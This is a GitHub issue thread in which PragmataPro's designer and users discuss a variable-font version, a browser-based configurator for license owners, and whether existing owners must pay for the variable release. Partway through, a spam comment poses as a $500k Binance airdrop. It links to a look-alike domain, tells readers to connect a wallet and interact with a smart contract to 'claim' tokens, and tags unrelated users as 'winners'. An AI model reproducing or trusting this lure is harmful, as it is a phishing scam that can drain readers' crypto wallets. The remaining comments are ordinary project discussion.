### ISSUE TITLE
variable version with at least one adjustable axis

### ISSUE THREAD

**Issue by mkarmona** [fabrizioschiavi/pragmatapro#234]
@fabrizioschiavi is it worth exploring a variable version of the font with one or two axes to adjust so users can meet their particular requirements? As an example, [Cascadia offers a variable version](https://github.com/microsoft/cascadia-code#font-formats) with a weight axis for upright and italic so the user can adjust the weight axis in each variable font. Whether italic can become another adjustable axis (see [Recursive font case](https://github.com/arrowtype/recursive#axis-definitions)) I made use of the [application SliceGUI](https://pypi.org/project/slicegui/) to generate my customised versions of the font in the past. Thus, I can have the right weight of the font as DPIs change between monitors whether the resolution is 4k.
As an example, here is how the variable Cascadia looks with the weight customised on my computer (185 DPI) using a weight of `360` for regular and `560` for the bold-variant.

![image](https://user-images.githubusercontent.com/5394232/143054533-e65edf12-db24-41e2-93e0-0e9e4e9385c3.png)

and here is the default version of the font (which is rather heavy for my taste)

![image](https://user-images.githubusercontent.com/5394232/143054821-860cdd96-eaf0-4a3e-b04d-87af6d0f0951.png)

You could argue that the default variable version already contains the versions of the segmented weight but not all software allows it or has the option to customise other than the regular/bold option.

**Comment by fabrizioschiavi** [comment]
This is exactly the goal in the near future: to create a variable font version of PragmataPro.
It's one of the most ambitious goal of all times. 10,000 glyphs with TrueType hinting as variable font?! 
Probably the first font designed with this characteristics.

**Comment by mkarmona** [comment]
@fabrizioschiavi, is there any estimated date for the release [0.830](https://github.com/fabrizioschiavi/pragmatapro/projects/4#card-73522339)? There are 16 items piled up in the ToDo column. I would like to know if a variable version of the font will come for the next release. Thanks.

**Comment by fabrizioschiavi** [comment]
You've right @mkarmona it passed time from 0.829 and I feel the need to update PragmataPro as soon as possible but I can't find time because I'm working at big projects in these years. I hope to come back to PragmataPro asap

**Comment by mkarmona** [comment]
Hi @fabrizioschiavi. It could be great if you could prioritise a variable version of Pragmata Pro and a way to configure it, like Input from DJR.

**Comment by fabrizioschiavi** [comment]
I’m at a good point with the Variable Font version.

https://user-images.githubusercontent.com/1576663/197709696-75002f0a-c7d1-46ee-b53a-6aec83f944a3.mov

I still need of a good programmer to make the configurator. Can you help me?

**Comment by mkarmona** [comment]
@fabrizioschiavi, I am afraid I am busy right now. Although, it will be great if we could draft the task.

- Does the configurator need to run on the user's side (client side)?
- What font features do we want to configure?
- What tools do we need to configure the font?
- is there any tool on GitHub that can be used for this purpose?
- ...

**Comment by fabrizioschiavi** [comment]
The configurator I have in mind is very similar to the existing Iosevka or Input configurators:
based on web browser (no standalone softwares) where only the PragmataPro license owners can access, choose weights of the font, choose the OT features and download the font files.
I suppose this web page needs to interact with the existing database at fsd.it
The OpenType features are the ones presents in this [handbook](https://fsd.it/pragmatapro/Handbook.png).
I don't know specific tools on GitHub but I suppose [fonttools](https://github.com/fonttools/fonttools) can be useful for this project.
Thank you!

**Comment by mfocko** [comment]
Just a note; you could probably reach out to Berkeley Graphics, since they've been tackling similar issue with configurator for their own font. They've also made some tweets about it (@berkeleygfx)

**Comment by fabrizioschiavi** [comment]
Thanks @mfocko for your suggestion but yesterday I was contacted by @svipas and much probably he will made this configurator 🙌

**Comment by svipas** [comment]
@fabrizioschiavi Not made it 😅 but I will be working on it 🙂

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @SantoshSrinivas79, @Ghosty-chan, @Trezcool, @Codespacito, @hongthana, @cedriking, @DimPap99, @bydooweedoo, @adarsh-mamgain, @nelsinho11

**Comment by mfocko** [comment]
Hi! Just to make sure, if I understand the current state correctly, are we supposed to buy the new Variable version?

**Comment by fabrizioschiavi** [comment]
Yes, @mfocko — the variable project took me **two years of very intense work**. 
Because of that, I’m not able to include it with the static version of PragmataPro. 
I really hope you can understand and appreciate the effort that went into it.

**Comment by mfocko** [comment]
I was thinking about it and I'm kinda conflicted… mainly because this is a `0.9` release, so when I also take in account the fact that after `1.0` only bugfixes will be made available for the existing owners, I'd probably choose to wait before getting the variable version, regardless of an upgrade path IMO
